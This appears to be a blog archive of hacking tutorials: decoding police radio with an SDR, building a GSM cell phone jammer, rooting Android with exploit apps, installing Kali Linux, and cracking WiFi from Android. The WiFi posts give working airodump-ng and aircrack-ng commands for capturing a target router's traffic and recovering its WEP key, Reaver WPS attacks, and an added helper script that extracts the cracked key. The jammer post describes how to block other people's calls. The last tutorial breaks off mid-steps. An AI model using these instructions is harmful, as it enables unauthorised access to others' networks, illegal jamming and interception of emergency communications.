
Tuesday, 30 May 2017

Building a Radio Listening Station To Decode Digital Audio & Police Dispatches


On April 7, 2017, residents in Dallas, Texas, woke to the sound of emergency sirens blaring all over the city. No one could shut them off, and after repeated efforts to contain the situation, the city had to shut down the entire system. While the media reported a sophisticated computer hack was responsible, the truth was much less high-tech.
The sirens in Dallas were controlled by a series of radio signals that weren't encrypted, and anyone could broadcast them with the right equipment. Turns out, someone simply listened in to the radio signal during a test or real emergency that triggered the sirens to go off, then played it back later. This low-tech hack managed to use the principles of signals intelligence to control a system via radio waves.
But how would someone sniff radio signals — and then use them to control or interact with a system?
Things like garage door openers, car keys, and apparently emergency sirens are controlled by radio frequencies that can be eavesdropped on, decoded, or even simply rebroadcast to trigger the same effect. In this series, we will learn to both detect and listen in on these hidden radio frequencies, then rebroadcast or transmit them — on the $35 Raspberry Pi, no less.
Getting Started with a Portable Radio Listening Station
This build will teach you to detect local radio signals outside the "normal" FM band you're used to tuning into in your car or on your commercial FM radio. We will create a portable listening station to explore the VHF (very high frequency) and UHF (ultra high frequency) spectrums and decode digital audio data to make sense of the sounds in the world around you.
This will start our series on signals intelligence (SIGINT), which is the analysis of signals to discern intelligence about a target. Of course, the first step in analyzing a signal is being able to hear it, so we'll need to dive into talking about both software-defined radio (SDR) and the radio frequency spectrum we'll be pulling the signal from.
The Radio Spectrum
There's an invisible conversation going on around us in the radio frequency spectrum all the time. Though we can't see it, we transmit our civilization's wireless data overwhelmingly through the radio frequency spectrum.
Visible light sits on that spectrum between 430–770 THz, which is what our biological eyes can sense. But down in the sub-1 GHz range lies much of our radio communication, including FM radio and the communication that takes place between law enforcement and first responders.
Wouldn't it be great if you could peer into this spectrum and make sense of signals your biological body isn't built to perceive?
The basics of the radio frequency spectrum.
The radio spectrum is huge, so to avoid getting lost, this guide will be quite specific. However, there is a lot to explore and this guide is only the beginning. If you're curious about the signals you're receiving, you can always reference them against this handy chart if you're in the United States. In this guide, 24 MHz to 1.7 GHz is where we'll be operating.
Gather Your Materials
To accomplish this tutorial, you'll need an SDR dongle and antenna to receive and convert the signal. You'll also need software to interpret the radio signal, as well as a separate program to decode digital speech.
The Software-Defined Radio Receiver
SDR takes the parts of radio tuning that were normally done by crystals or local oscillators and accomplishes them with software instead. The basic requirements for such a system are a personal computer (or Raspberry Pi), a sound card or signal processor, and an RF receiver to receive the signal. As a result, many of the processes done by dedicated hardware are now done by a computer, making the entire radio system very low cost and flexible.
The team at RTL-SDR created a very cheap software-defined radio receiver that uses a DVB-T television tuner dongle based on the RTL2832U chipset, which they wrote a new software driver for to directly access the signal data. Their SDR kit gets you up and running for a mere $25.
Your other options, if you're feeling fancy, are the $169 Airspy R2 or the $149 SDRPlay. While those are certainly nice, I prefer low-cost, open-source, and commonly used tools for hacking, so we will focus on the RTL-SDR.
I used an RTL-SDR plus two adjustable antennas, but any SDR kit that can tune into around the 400–600 MHz range should do fine. This tutorial will use the RTL-SDR's device settings in our SDR radio program; you may need to modify them to get a different adapter to work.
The SDR Software
Next, we will need software to interpret the radio signal. The open-source GQRX is my tool of choice, after managing to get it working on macOS Sierra and Kali Linux. This guide will cover macOS. However, I will cover the Kali install on a Raspberry Pi another time, as it requires a lot of dependencies and needs the sound cards to be working properly. The macOS build is more straightforward.
The Digital Speech Decoder
My macOS listening post build relies on the ability to decode digital data we intercept live to listen in on conversations. To do so, we will focus on one common type of signal we hope to intercept — digital audio.
Digital audio constitutes a signal of interest because it's frequently used by police and security organizations for communication and is often not encrypted, only encoded, as though encoding were protection enough. This, of course, is silly, since encoding can be easily undone.
In my city, police do not encrypt dispatch except for tactical channels, it's just encoded as digital audio, so we'll use DSD to break the code live and listen in to their communications. We do this by streaming the audio via UDP (User Datagram Protocol) to DSD running in a terminal window below GQRX that decodes digital audio.
Decoding some digital audio.
Someone might point out that there are websites where you can stream these kinds of signals decoded by someone with a fancy, expensive radio and streamed digitally. That's great, but the stream is from a third party provided over the internet. Source your own data. For the cost of an SDR tuner and the software to run it, you can target specific agencies in your area for data collection.
Install GQRX
GQRX, as pictured above in Kali, required a ton of dependencies. Want to compile them for hours? Me neither, so we'll install them using MacPorts. There is also a version available via Homebrew, but I was disappointed to find it didn't work properly.
First things first: MacPorts. Head to the MacPorts homepage and download the appropriate version, ensuring you've downloaded and installed Xcode and the Xcode Command Line Tools. Once Xcode is all ready, install MacPorts via the guided install, and you should be ready to begin installing GQRX.
Run GQRX
To ensure everything is up to date, update MacPorts by typing the following in terminal:
    sudo port selfupdate
Now, the battle begins. To download and install all the dependencies for GQRX, enter:
    sudo port install gqrx
You may get errors while installing, as I did. For my Mac, this took six tries. Each time I chewed through more dependencies before getting an error and having to start the command over, and each time the list of dependencies got smaller until finally, they were all installed. Eventually, your resolve will defeat the machine and you will finish installing the complete list of dependencies.
Once the install is complete, run GQRX by typing the following in a terminal:
    gqrx
Decode Digital Audio with DSD
To install DSD, we will need to install Homebrew since, of course, it's not available in MacPorts. Thanks to Hugh Dev, there is a nicely documented way to install a speech decoder via Homebrew.
To install Homebrew, run the following in terminal (ignore the giant spaces if you see them, they're just one space each):
    ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
Once this is complete, we can install DSD. Run the following commands in terminal to install DSD:
    brew install git cmake libsndfile itpp portaudio
    brew install --HEAD mbelib
    git clone https://github.com/szechyjs/dsd.git
    cd dsd && mkdir build && cd build
    cmake ..
    make
    sudo make install
Run "dsd -a" to see a list of available audio sources. We'll need this later to connect the audio from our receiver to DSD. In this case, it's pretty straightforward.
Configure GQRX with the RTL-SDR
If you try to start capture in GQRX with the wrong settings enabled, it will likely crash. Click on the hardware configuration tab (the green chip icon next to the "play" symbol on the top left of the screen) and enter settings matching the following configuration.
I/Q input:
    Device: Other...
    Device string: rtl=0
    Input rate: 1800000
    Decimation: None
    Sample rate: 1.800 Msps
    Bandwidth: 2.700000 MHz
    LNB LO: 0.000000 MHz
Audio output:
    Device: Built-in Output
    Sample rate: 48 kHz
Once your configuration matches mine, click okay and then plug in your RTL-SDR with antenna deployed. Due to something I did, I'll remind you to turn down your audio, take out any headphones, and turn down the gain.
Next, click the play button to start the capture.
Capture Unencoded Audio from Our Listening Station
If everything went well, we have the entire spectrum the RTL-SDR can tune into at our disposal. For practice, tune to a channel between 88 and 102 MHz, the standard range for FM radio. Set the "mode" to FM mono (or stereo depending on which sounds better), and click on a strong signal you can see in that range. You should hear audio play. You're tuning into public broadcasts. Explore up and down the frequency to start finding other unencoded broadcasts, using the guide above to understand the signals you find.
Find Encoded Audio to Decode
Look up what frequencies emergency services in your area use and navigate to that set of frequencies. If you live in a city like I do, this should be lit up with transmissions that look like "waterfalls" of data rather than waveforms of FM transmissions. In these frequencies, you may find unencoded dispatch frequencies and private security company two-way radio communication as well, but you must switch modes to hear it.
Switch "mode" to narrow FM and try tuning into an unencoded audio stream if one is available. If one is not, target a waterfall that looks like the one in the picture below. Select the "UDP" option in the audio window as shown below in blue to output our audio to DSD.
Look for streams that turn on and off. Always-on streams are usually trunk relay units or other logistics-related data transmissions that aren't human voices we can decode. Once you find a promising one, let's try decoding it.
With the station locked on and UDP selected, run the following in terminal to check if the output is working.
    nc -u -l localhost 7355
If so, run the following to begin decoding digital speech, with pa:1 the number of the output device we found before.
    nc -l -u localhost 7355 | dsd -i - -o pa:1
As packets are received from the air, they will show up in DSD.
Successful intercept of digital audio from emergency services.
The packets in the photo above are indicative of a digital voice transmission being intercepted and decoded live.
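Before piping the UDP stream into DSD, it helps to confirm that GQRX is really sending audio and that the squelch is opening, which a level meter shows more clearly than raw bytes scrolling past in nc. The script below is an added example written for this page; it is not code from the original post, from GQRX, or from DSD. It assumes (the page does not state it) that GQRX's UDP output is headerless 16-bit signed little-endian PCM, mono, at the 48 kHz audio rate configured above, sent to 127.0.0.1:7355; the -50 dBFS activity threshold is likewise an assumed starting point.

```python
"""Level meter for the UDP audio stream GQRX emits when its UDP button is on.
Added example, not code from the original post, GQRX or DSD.

Assumption (not stated on the page): GQRX sends headerless 16-bit signed
little-endian PCM, mono, at the audio sample rate (48 kHz as configured
above), to the host/port set in its audio options (127.0.0.1:7355 default).
"""
import math
import socket
import struct
import time

SAMPLE_RATE = 48_000       # matches the "Audio output: 48 kHz" setting above
BYTES_PER_SAMPLE = 2       # one int16 per mono frame (assumption)
FULL_SCALE = 32768.0       # int16 full scale, the 0 dBFS reference


def rms_dbfs(pcm: bytes) -> float:
    """RMS level of a buffer of int16 LE samples in dBFS; -inf for silence."""
    n = len(pcm) // BYTES_PER_SAMPLE
    if n == 0:
        return -math.inf
    samples = struct.unpack(f"<{n}h", pcm[: n * BYTES_PER_SAMPLE])
    mean_square = sum(s * s for s in samples) / n
    if mean_square == 0:
        return -math.inf
    return 20.0 * math.log10(math.sqrt(mean_square) / FULL_SCALE)


def classify(level_dbfs: float, threshold_dbfs: float = -50.0) -> str:
    """Label a window 'active' (squelch open, audio present) or 'silent'.

    -50 dBFS is an assumed threshold: squelched output from GQRX is close to
    digital silence, while an open squelch sits far above this level.
    """
    return "active" if level_dbfs > threshold_dbfs else "silent"


def make_tone(amplitude: int, freq_hz: float = 1000.0, seconds: float = 1.0) -> bytes:
    """Constructed test input: a sine wave encoded like the assumed GQRX stream."""
    n = int(SAMPLE_RATE * seconds)
    samples = [int(round(amplitude * math.sin(2 * math.pi * freq_hz * i / SAMPLE_RATE)))
               for i in range(n)]
    return struct.pack(f"<{n}h", *samples)


def meter(host: str = "127.0.0.1", port: int = 7355,
          seconds: float = 10.0, window: float = 0.25) -> list:
    """Bind the port GQRX sends to, print one reading per window and return
    the (level_dbfs, state) readings. Run this in place of the nc check while
    GQRX's UDP button is enabled; the time limit or Ctrl-C stops it."""
    window_bytes = int(SAMPLE_RATE * window) * BYTES_PER_SAMPLE
    readings = []
    buf = bytearray()
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.bind((host, port))
        sock.settimeout(1.0)
        deadline = time.monotonic() + seconds
        while time.monotonic() < deadline:
            try:
                datagram, _ = sock.recvfrom(65536)
            except socket.timeout:
                print("no datagrams received: is the UDP button in GQRX enabled?")
                continue
            buf += datagram
            # Emit a reading for every full window of samples received.
            while len(buf) >= window_bytes:
                level = rms_dbfs(bytes(buf[:window_bytes]))
                del buf[:window_bytes]
                state = classify(level)
                readings.append((level, state))
                print(f"{level:7.1f} dBFS  {state}")
    return readings


if __name__ == "__main__":
    meter()
```

A window that never leaves "silent" while the waterfall shows a transmission usually means the squelch is set too high or the UDP button is off, both of which DSD would otherwise report only as a lack of decoded frames.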
Squeeze Speech Out of a Bad Signal
Some signals won't yield voice because they are encrypted (rather than encoded) or require some tweaking to lock on to. Try narrowing or expanding the filter, adjusting the gain or squelch, or going up or down the spectrum to get a voice stream to begin flowing through DSD. Be creative in your antenna placement and note differences in reception in response to things you do or places you put it.
This build gives you the ability to scan normally invisible spectrums and begin to listen in on those who may think they are communicating in private. While decoding radio broadcasts is legal in the US, things get interesting when we go up to cellular phone and Wi-Fi transmissions.
Make sure to check out my follow-up guide, where I go over broadcasting signals from a Raspberry Pi in the radio spectrum by simply adding a piece of wire.
Thanks for reading, and make sure to keep an eye on my blog for more hacking tutorials. You can ask me questions here or @joelvaiju on instagram.

Wednesday, 18 January 2017

Build a Home Made Cell Phone jammer

Technical details:
Many cell phones use the GSM800 mobile standard to operate, so my VCO (sweeping oscillator) is tuned to the 800 MHz frequency range. It may be quite difficult to make this one work properly without some skills and good testing tools, but the result is an efficient VCO.

I used a 45 MHz clock oscillator as the noise generator for this jammer. It drives the local oscillator port of the mixer. The signal from the local oscillator passes through an impedance matching network on its way, which equates the impedance of the 45 MHz clock oscillator with the impedance of the mixer's port.

This port acts as the RF input of the signal jammer. The RF output signal passes through the amplifier on the mini-circuit, which increases the output power by an additional 15-16 dBm. Then the output signal goes to the RF output antenna. The RF input has an antenna too.

Jammer operating:
Why did I choose a 45 MHz clock oscillator? Because in the GSM800 band the transmitted and received signals are always separated by an exact frequency offset, and that offset is 45 MHz. Now picture this: a cell phone user dials someone and the signal goes out. The RF input antenna catches it, the jammer modifies this signal and lets it go. This signal has the frequency of the cell phone's received signal, so the cell phone user would hear his or her own voice in the phone! :)

I should also mention that this particular cell phone jammer might be used to block the signal of a cell-based car tracking device which records your GPS data and sends it to some bad guys. And it probably can even jam some IED signals if they are controlled by a cell phone on the GSM800 band.

But I hope there will be no situation in this life when that feature will be needed by me, or you, or anyone else.

Monday, 10 October 2016

Benefits Of Rooting Android Devices And How To Root Without Computer

To root or not to root? It's a question that most people don't ever ask themselves, because Android devices are powerful and customizable from the get-go, and rooting can be risky. But it's not that risky.

And if you want to really unlock the full potential of your device—if you want to be able to control everything, backup everything, customize everything, and do all sorts of fun things like install custom ROMs and get Android Lollipop ahead of the pack—you’ll need to root your phone.

I’m not saying you have to root your Android device… but I am saying you might be a goody two-shoes if you don’t.

Benefits of Rooting Android Devices

Automate everything

Powerful root-only apps like Tasker can turn your dream of a super-smartphone into a reality. Tasker uses the “if this, then that” mentality to make your phone a genius — for example, you can use Tasker to automatically silence your phone at night, turn on your Wi-Fi when you’re at home, or open up an app when you connect to your car’s Bluetooth.

Lollipop, here I come!

Android phone makers have a habit of not releasing updates in a timely manner. Or at all, sometimes. So why are you still waiting for the latest OS when you could simply root your phone and get it right now? Patience is for people who don't know how to root.

Faster than the speed of… your CPU

Contrary to what the phone-makers want you to believe, your Android device could definitely be faster. And you can take speed matters into your own hands with apps like SetCPU, which is only available after you root. What’s a little battery life lost when you have more power?

Better battery life

You know how you can overclock your device’s CPU for ultra-speedy app-switching (who doesn’t want to multitask like Sonic the Hedgehog)? Well you can also use SetCPU to underclock, or slow down, your CPU for when you need that extra 29 minutes of battery life.

Bye-bye, bloatware

Nuking factory-installed bloatware beats disabling it any day.

Really, really back up your stuff

OK, so Google does a pretty good job of keeping your mail, contacts, calendar, apps, and other Google-y things in order. But if you want to truly back up everything, as in, if you want to take a literal snapshot of your device and stick it somewhere safe, you'll need the root-only Titanium Backup. Satisfy your hoarding tendencies!

Customize all the things!

Android is pretty customizable, even without rooting your phone. But with root you can literally customize everything. Vibration strength? Precise screen color calibration? Gesture control? There's a (root-only) app for that.

Store apps wherever the hell you want to

Use a root-only app like Folder Mount to store apps, not just files, on your microSD card. Now your device has infinite (read: 128GB) of real usable storage!

Rooting your Android device gives you superuser access on your phone; with root you can even uninstall built-in apps. Now I am going to show you two easy ways to root your Android device without a computer.

Method 1: Framaroot

Framaroot is an Android app that can easily root your Android device. It's not available in the Play Store, so click here to download the app and install it.

After installing, open the app and choose Install SuperSU from the dropdown menu shown above.

It shows a number of exploit methods to root your Android device; choose any one of them. My first preference is Boromir; if it fails, try the other exploit methods.

Within seconds it shows the result. After that you need to restart your device to install SuperSU, which manages root access; you need an internet connection to download it.

UnRoot

If you need to unroot your Android device, simply select the Unroot option from the Framaroot drop-down menu given below.

This method helps to root and unroot your Android device in an easy way. It works for most Android devices; if it does not work, follow method 2.

Method 2: Kingroot

Kingroot gives you one-touch root access. Click here to download the app. Install and open the Kingroot app.

Tap the START ROOT option to root your Android device. The rooting process looks like the one given below.

After rooting you will get a confirmation screen like the one given below.

Now your Android device is rooted. Enjoy the superuser access on your Android.


How to Install Kali Linux on Android – Tutorial

With Kali Linux, hacking becomes much easier, since you have all the tools (more than 300 pre-installed) you are probably ever going to need. Others can be downloaded easily.

In my previous article I explained Introduction To Hacker's OS: Kali Linux And Setup Tutorial for PC, but in this article I have a great idea: set up Kali Linux on Android devices. It will help you turn your Android device into a hacking tool with the greatest hacker's OS, Kali Linux.

This tutorial helps you run any GNU/Linux distribution on your Android device. Here I am going to show the easy way to install Kali Linux on an Android phone; Kali Linux is the best hacking software ever.

Installing Kali Linux on an Android phone is very easy. You need the following requirements.

1. Rooted Android Device.(Refer Here)

2. Busybox Installer.(Download)

3. Linux Deploy.(Download)

4. Android VNC Viewer.(Download)

5. 4GB Free Space on your External Memory.

6. High Speed Net Connection.

STEP 1:(Rooting Android Device)
Root your android device with the given tutorial.

STEP 2:(Installing Busybox)
First we need to install BusyBox's UNIX tools on our device using the Busybox Installer app. Download the app from the link given above and install it on your device. Open the app and follow the given steps.

1. Choose the Busybox version from the drop-down menu.

2. Tap the install button.

3. It will download the scripts to be installed.

4. After installing you will get the success message.

Now you have successfully installed busybox in your android device.

Note: If the installation fails, you need to choose a different Busybox version.


STEP 3:(Configure Linux Deploy)

Linux Deploy is the official app to download and install Kali Linux on Android. Download the app and install it on your Android device. Now open the app and follow the given steps.

1. Tap the properties icon; it will open the properties screen.

2. In properties, select the distribution to be installed.

3. Leave the other settings at their defaults and set the desktop environment to GNOME.

4. Select all the components in the Components menu.

5. In GUI settings, just interchange the height and width values.

6. Now select the install button and then OK.

7. Now the installation process starts. Be patient; the installation takes a long time to complete. Block incoming SMS and voice calls, or turn off the SIM and use Wi-Fi to download, because an interruption of cellular data cancels the download process.


8. Now tap the START button and tap OK; it will mount the Linux image.

9. Note the IP address in the top left corner of Linux Deploy; it changes periodically.


STEP 4:(Configure Android VNC)

Now open the Android VNC Viewer. Enter a nickname and the password (the default password for Kali Linux is changeme), give the IP address copied from Linux Deploy (for me it is 192.168.1.35), port 5900 and username android, and set color to 24-bit color (4bpp). Finally tap the Connect button and you will see Kali Linux on your Android device.

STEP 5:

To close Kali Linux, exit the VNC viewer, then go to Linux Deploy and simply tap the Stop button and then OK; it will close the mounted image. You can now use Linux penetration testing tools on your Android phone; it is most popular for cyber hacking.

I hope this will work. I tested it on my HTC Desire 816G octa-core variant, InFocus M2 3G and Samsung Galaxy S3. If you have any problem please feel free to ask me. Thank you.


Sunday, 9 October 2016

An Introduction To Hacker’s OS: Kali Linux Setup Tutorial

We have had innumerable discussions on computer security till today. This article brings to you one of the biggest and the most important tools that every penetration tester or a hacker uses.

Today we are going to introduce you to Kali Linux, a Linux distribution which is more of a branch of Debian, but with several specialties. If you have heard of BackTrack, then Kali should be introduced to you more as an updated version of the former. "From the creators of BackTrack comes Kali Linux, the most advanced and versatile penetration testing distribution ever created" is how Offensive Security Ltd. defines their project. Kali Linux is an operating system specially designed for penetration testing and security auditing. It is open source software, stuffed with numerous penetration testing tools; discussing and naming all of them is next to impossible, as it has over 300 of them. This blog puts forward my efforts to introduce the readers to the basics of Kali, which will help them get a head start with this OS. Besides the basic utility tools and applications present in every OS distribution, Kali is preinstalled with the best programs and security tools like Hydra (login cracker), Nmap (port analyzer), Wireshark (data packet analyzer), John the Ripper (password cracking tool) and Metasploit Framework (exploit code developing tool), and other tools put together under the category of "Top 10 Security Tools" under the "Applications" tab. Initially they might sound like Hebrew, but it isn't that difficult to get a good hold on these tools once you start exploring them.


Kali also has other tools categorized separately for:
*.Information Gathering

DNS analysis tools

Network Scanners

Traffic Analyzers

*.Vulnerability Analysis

Cisco Tools

Database Management tools

Open Source Assessment tools

*.Web Applications

CMS Identification tools

Database Exploitation tools

Web Vulnerability Scanners

*.Password Attacks

Offline Attack tools

Online Attack tools

*.Wireless Attacks

Bluetooth tools

Wireless tools

NFC/RFID tools

*.Exploitation Tools

BeEF XSS Framework

Social Engineering tools

Network Exploitation tools

*.Sniffing and Spoofing

Network and Web Sniffers

Network Spoofing tools

Voice and Surveillance tools

*.Maintaining Access

Backdoors

Tunneling tools

*.Reverse Engineering

Debuggers

Misc RE Tools

*.Stress Testing

Network Stress Testing tools

WLAN Stress Testing tools

*.Hardware Hacking

Android Tools

Arduino Tools

*.Forensics

Anti-Virus Forensics tools

Forensic Analysis tools

*.Reporting Tools

Besides these, Kali has numerous other tools too, which are among the best security and penetration testing tools ever found. Kali Linux, being free and open source software, is easily obtainable, and is used by both amateurs and professionals. Professionals use it for analyzing vulnerabilities in information systems and networks, for forensic analysis, for finding security exploits, and for application testing. Peeping into the hackers' den, Kali can be utilized in breaking security codes, cracking passwords, hacking into Wi-Fi networks, brute force password attacks, network sniffing, IP spoofing and other malicious ventures. However, learners and amateurs can learn a lot from this OS. This distribution probably has enough tools to last a penetration tester's lifetime. Therefore hands-on experience will not only enable a beginner to know new things, but also introduce him to the cutting edge technologies used by pen testers and crackers. If you are considering a career in information security, then Kali Linux is the best option for you to start your journey with.

One can install Kali Linux in the hard drive, or run from a Live CD, or a Live USB. Kali is also available for ARM devices like Chromebook, Galaxy Note 10.1 etc.


Kali Linux Dual Boot with Windows

Installing Kali alongside a Windows installation can be quite useful. However, you need to exercise caution during the setup process. First, make sure that you've backed up any important data on your Windows installation. Since you'll be modifying your hard drive, you'll want to store this backup on external media. Once you've completed the backup, we recommend you peruse Kali Linux Hard Disk Install, which explains the normal procedure for a basic Kali install.


In our example, we will be installing Kali Linux alongside an installation of Windows 7, which is currently taking up 100% of the disk space in our computer. We will start by resizing our current Windows partition to occupy less space and then proceed to install Kali Linux in the newly-created empty partition.

Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium. If you do not have a DVD or USB port on your computer, check out the Kali Linux Network Install. Ensure you have:

*.Minimum of 8 GB free disk space on Windows

*.CD-DVD / USB boot support

Preparing for the Installation

1. Download Kali Linux.

2. Burn the Kali Linux ISO to DVD or copy Kali Linux Live to USB.

3. Ensure that your computer is set to boot from CD / USB in your BIOS.

Dual Boot Installation Procedure

1. To start your installation, boot with your chosen installation medium. You should be greeted with the Kali boot screen. Select Live, and you should be booted into the Kali Linux default desktop.

2. Now launch the gparted program. We'll use gparted to shrink the existing Windows partition to give us enough room to install Kali Linux.

3. Select your Windows partition. Depending on your system, it will usually be the second, larger partition. In our example, there are two partitions; the first is the System Recovery partition, and Windows is actually installed in /dev/sda2. Resize your Windows partition and leave enough space (8 GB minimum) for the Kali installation.

4. Once you have resized your Windows partition, ensure you "Apply All Operations" on the hard disk. Exit gparted and reboot.


Kali Linux Installation Procedure

1. The installation procedure from this point onwards is similar to a Kali Linux hard disk install, until the point of the partitioning, where you need to select "Guided – use the largest continuous free space" that you created earlier with gparted.

2. Once the installation is done, reboot. You should be greeted with a GRUB boot menu, which will allow you to boot either into Kali or Windows.

Now that you’ve completed installing Kali Linux

How to hack wifi using android

It is one of the most searched queries on the Internet: How to hack WiFi using an Android mobile? Is it possible to hack WiFi using Android? Well, the answer is yes. Android is an operating system based on the Linux kernel, so almost all such hacks and tricks are possible. But since an Android device is not as powerful as a normal PC, there are certain conditions and requirements to be satisfied in order to hack WiFi with it. There are hundreds of fake apps and malware which claim to hack WiFi in seconds; remember there are no such 'one click WiFi hacking apps'. In simple words, not every Android device can hack WiFi, and also it may take hours or days for a successful hack.

How to Hack WiFi Using Android?

Proceed only if your device falls under either of the categories below. Otherwise it is a waste of time and energy. For better results use a Cyanogen ROM.

1. Android device should be rooted.

2. Android device should support the bcmon app (i.e. should have a Broadcom bcm4329/4330 WiFi chipset). [OR]

3. [Update] Now 'non-bcmon-supported devices' and 'devices which support external WiFi cards' can also be used to hack WiFi. Check this post: How To Hack Wifi Using Android Without bcmon

Tools Used:

*.bcmon app [apk] - This tool enables Monitor Mode on your rooted device with a Broadcom chipset, which is essential for hacking WiFi using Android. Download

*.Reaver for Android or RfA - A WiFi pentesting tool which can be used to attack WPS-enabled routers; after the WPS PIN is cracked, it can retrieve the actual WPA key. Download

Hacking WPA/WPA2 (WPS Enabled) WiFi using Android [bcmon supported devices]

*.Download and install the bcmon app.
*.Run bcmon. It may crash at first but keep trying. If it still crashes after 3-4 attempts the device may not be supported.
*.Install the firmware and tools, as prompted. Click on 'enable monitor mode'.
*.Download and install Reaver and run it.

*.Reaver will scan for available access points. Remember it can hack only WPS-enabled WiFi. Make sure 'Monitor Mode' is turned on. Make sure that the "Automatic advanced settings" box is checked.

*.Choose the network to hack and tap "Start Attack". It will take between 2-10 hours to hack. And sometimes it will never be successful, depending on the router type.

Hacking WEP type WiFi Using Android Phone

WEP is an outdated, extremely weak protocol to secure WiFi and it is no longer preferred because it can be hacked within seconds. However, due to lack of awareness it is still used across the world. The instructions below explain how you can use your Android device to hack a WEP-protected WiFi network.

Procedure

*. The bcmon app is used here too, so download and install it as described above.
*. Tap "Run bcmon terminal". This launches a terminal similar to most Linux terminals.
*. Type airodump-ng and tap Enter. In the newly opened window type airodump-ng wlan0 and tap Enter. (wlan0 is the interface bcmon put into monitor mode; if your device shows a different name, use that name in every command below.)

*. Note down the WiFi (access point) name, MAC address (BSSID) and the broadcasting channel of the network you want to attack, either from the airodump-ng listing or from Reaver's scan. Make sure its encryption is WEP.
*. Now start capturing packets from that network only. Type the following:

*. airodump-ng -c channel# --bssid MACaddress -w outputfile wlan0

*. Note: channel# is the broadcasting channel and MACaddress is the MAC address of the router, which you already noted down. -w specifies the prefix of the capture file; I have used outputfile in the example, and airodump-ng will write outputfile-01.cap. The complete command looks similar to this (the original post used ath0 as the interface name; substitute the one your device reports):

*. airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w outputfile wlan0

*. Continue capturing until the #Data column reaches 20,000-30,000 packets. The attack needs many packets with distinct IVs, so a quiet network takes much longer than a busy one.
*. Once enough packets are collected, return to the terminal and type aircrack-ng outputfile*.cap and tap Enter. aircrack-ng will attempt to recover the WEP key from the captured packets.

*. This may take a while, though usually far less than the capture did. Finally the message KEY FOUND! will appear, followed by the key in hexadecimal form. Trust the key only if aircrack-ng also reports Decrypted correctly: 100%.

*. Remove the ":" from the key, i.e. if it is 19:04:56:77:94, the key would be 1904567794. Enter it as a hex key, not as a passphrase.
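The few manual steps above (copying a BSSID into the capture command, pulling the key out of aircrack-ng's output and stripping the colons, and checking that what came out is actually a WEP key) are easy to get wrong on a phone keyboard. The script below is an added example, not part of the original post or of aircrack-ng; it touches no radio, the aircrack-ng output it parses is constructed for the demo, and the default interface name wlan0 is an assumption (use whatever airodump-ng showed on your device).

```shell
#!/bin/sh
# Added example (not part of the original post): helpers around the
# airodump-ng / aircrack-ng steps. The sample output below is constructed.

# A BSSID copied from the listing must be six hex octets separated by colons.
is_bssid() {
    wep_h='[0-9A-Fa-f][0-9A-Fa-f]'
    case $1 in
        $wep_h:$wep_h:$wep_h:$wep_h:$wep_h:$wep_h) return 0 ;;
        *) return 1 ;;
    esac
}

# Build the capture command from the values noted down in the listing.
# $1 channel, $2 bssid, $3 capture file prefix, $4 interface (default wlan0,
# an assumption: use the interface that is actually in monitor mode).
wep_capture_cmd() {
    is_bssid "$2" || { echo "bad bssid: $2" >&2; return 1; }
    printf 'airodump-ng -c %s --bssid %s -w %s %s\n' "$1" "$2" "$3" "${4:-wlan0}"
}

# Pull the key out of aircrack-ng's result line, e.g.
#   KEY FOUND! [ 19:04:56:77:94 ]
# and drop the colons, which is the form the WiFi join dialog expects.
wep_key_from_output() {
    sed -n 's/.*KEY FOUND! *\[ *\([0-9A-Fa-f:]*\) *].*/\1/p' | tr -d ':' | head -n 1
}

# aircrack-ng also prints how sure it is; only a 100% result is worth typing in.
wep_result_confirmed() {
    grep -q 'Decrypted correctly: 100%'
}

# A WEP key is 40-bit (10 hex digits) or 104-bit (26 hex digits). Anything else
# means the parse went wrong or aircrack-ng had not finished.
wep_key_ok() {
    case $1 in
        *[!0-9A-Fa-f]*|'') return 1 ;;
    esac
    [ "${#1}" -eq 10 ] || [ "${#1}" -eq 26 ]
}

# Constructed sample of the tail of an aircrack-ng run (not a real capture).
SAMPLE_AIRCRACK_OUTPUT=$(printf '%s\n' \
    '                         Aircrack-ng 1.2' \
    '                 [00:00:03] Tested 1514 keys (got 30021 IVs)' \
    '            KEY FOUND! [ 19:04:56:77:94 ]' \
    '        Decrypted correctly: 100%')

# Demo: the capture command for the values in the post, then the key parse.
wep_capture_cmd 9 00:14:6C:7E:40:80 outputfile
key=$(printf '%s\n' "$SAMPLE_AIRCRACK_OUTPUT" | wep_key_from_output)
if printf '%s\n' "$SAMPLE_AIRCRACK_OUTPUT" | wep_result_confirmed && wep_key_ok "$key"; then
    echo "WEP key to enter: $key"
else
    echo "no usable key in output" >&2
fi
```

On the phone you would pipe the real thing: `aircrack-ng outputfile*.cap | tee crack.log`, then `wep_key_from_output < crack.log`. The length check matters more than it looks: a truncated key is silently rejected by the join dialog, and a 5-character ASCII key typed as hex will not work either.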

Credits: XDA

How To Hack WiFi Using Android Without Bcmon [Non bcmon Supported Devices]

Hi all, thanks for dropping by. Today I am going to tell you how to hack WiFi using your Android device. This is the second part of my WiFi hacking tutorial, How To Hack WiFi Using Android. The first part had a limitation: it only works on devices which support the bcmon app (devices with Broadcom bcm4329/bcm4330 WiFi chipsets). In this post I explain how to run the same attack on Android devices without a supported Broadcom chipset.

How to Hack WiFi using Android without bcmon.

Following the instructions carefully will let you use Reaver on an Android device without bcmon support or a Broadcom chipset. Make sure the following requirements are met before proceeding.

Requirements:

*. A rooted Android device.
*. Several APKs must be installed, so allow installation of apps from 'Unknown sources' in the security settings.
*. A supported USB OTG WiFi adapter (one whose driver supports monitor mode), for best results.
*. The three scripts shared below.
*. A WPS-enabled WiFi network (WPA/WPA2) in close range.

Instructions To Hack WiFi Using Android on Devices Without bcmon Support

We still need to install the bcmon app even though it is probably not supported by your device. The idea is to create bcmon's data folder with its files in place and, with some tweaks, make Reaver believe the device is bcmon-supported. Go ahead and follow the instructions below.

*. Download Reaver for Android (RfA) [apk] and install it.
*. Install Root Explorer from the Play Store. Alternatively you can use ES File Explorer.

*. Download the bcmon apk (it does not matter whether your device is supported).

*. Install and open the bcmon app.

*. Leave it open for a few seconds and then go to the home screen. (This step makes Android create the folder /data/data/com.bcmon.bcmon.)

*. Open Root Explorer or ES File Explorer and browse to the bcmon apk you downloaded.

*. Select it and press 'View', or select it and choose the 'Extract' option (an apk is an ordinary zip file).

*. Open the assets folder inside the extracted contents.

*. Copy all of its files to /data/data/com.bcmon.bcmon/files.

*. Replace or delete any folder or file that is already there.

